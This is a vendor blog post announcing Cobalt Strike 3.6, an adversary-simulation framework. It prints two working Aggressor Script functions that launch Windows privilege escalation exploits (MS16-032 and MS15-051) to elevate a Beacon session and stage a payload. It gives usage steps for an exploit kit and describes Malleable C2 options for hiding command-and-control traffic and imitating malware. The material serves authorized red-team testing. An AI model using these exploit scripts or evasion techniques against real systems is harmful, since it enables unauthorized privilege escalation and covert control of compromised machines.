Home » Blog » Cobalt Strike 3.6 – A Path for Privilege Escalation
Cobalt Strike 3.6 – A Path for Privilege Escalation
Thursday 08 December, 2016
Cobalt Strike 3.6 is now available. This release adds an API to use third-party privilege escalation exploits with Beacon and extends Malleable C2 to allow HTTP C&C without HTTP POST. This release also includes fixes and improvements for existing features.
sub ms16_032_exploit {
local('$script $oneliner');
# acknowledge this command
btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");
# generate a PowerShell script to run our Beacon listener
$script = artifact($2, "powershell");
# host this script within this Beacon
$oneliner = beacon_host_script($1, $script);
# task Beacon to run this exploit with our one-liner that runs Beacon
bpowershell_import!($1, script_resource("modules/Invoke-MS16032.ps1"));
bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $oneliner $+ \"");
# give it another 10s to work.
bpause($1, 10000);
# handle staging
bstage($1, $null, $2);
}
beacon_exploit_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_exploit);
Let’s try something else! The Metasploit Framework implements many of its privilege escalation exploits as Reflective DLLs. The flow of these Metasploit privilege escalation exploits is: spawn a patsy process, inject the exploit logic into the patsy process, inject the payload stager shellcode into the patsy process, and pass a pointer to the injected shellcode when the exploit DLL is run.
What if it were possible to use these DLLs within Beacon, as-is? Thanks to Aggressor Script's &bdllspawn function, this is now possible. This functions launches a Reflective DLL as a Beacon post-exploitation job. It can pass an arbitrary parameter to the DLL and it monitors STDOUT for output. The uses for this go far beyond privilege escalation! That said, here’s a script to use ms15_051_client_copy_image with Cobalt Strike’s Beacon payload:
sub ms15_051_exploit {
# acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051");
# tune our parameters based on the target arch
if (-is64 $1) {
$arch = "x64";
$dll = "modules/cve-2015-1701.x64.dll";
}
else {
$arch = "x86";
$dll = "modules/cve-2015-1701.x86.dll";
}
# generate our shellcode
$stager = shellcode($2, false, $arch);
# make sure we have shellcode for this listener (some stagers are x86 only)
if ($stager is $null) {
berror($1, "No $arch stager for listener ' $+ $2 $+ '");
return;
}
# spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, script_resource($dll), $stager, "ms15-051", 5000);
# stage our payload (if this is a bind payload)
bstage($1, $null, $2, $arch);
}
beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit);
The goal of these functions is to make it easier for your team to integrate custom capability with Cobalt Strike and quickly adapt new exploits for use with Beacon as they become available.
The Elevate Kit
If you’d like more privilege escalation examples, check out the Elevate Kit. This is an Aggressor Script that demonstrates how to use PowerShell and Reflective DLL exploits with Cobalt Strike’s Beacon payload.
To use the Elevate Kit: download the elevate kit files and extract them to your Cobalt Strike client system. Go to Cobalt Strike -> Scripts, press Load, and select elevate.cna.
Within Beacon: type elevate by itself to see a list of loaded exploits. Type elevate [exploit name] [listener] to launch an exploit against the current Beacon session.
Malleable C2 – HTTP Beacon without HTTP POST
Take a look at this screenshot of Beacon communication with the webbug_getonly profile. Which screenshot is Beacon downloading tasks from Cobalt Strike? Which side is Beacon sending a response to Cobalt Strike?
This release adds a great deal of flexibility to Beacon’s HTTP communication via Malleable C2. You may now set the HTTP verb for Beacon's http-get and http-post transactions. You may also push Beacon’s responses into the URI, a header, or a parameter. Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel.
If you like to challenge analysts and craft profiles, these changes are a lot of fun. These changes also make it possible to "emulate" the HTTP traffic of different malware with much more fidelity.
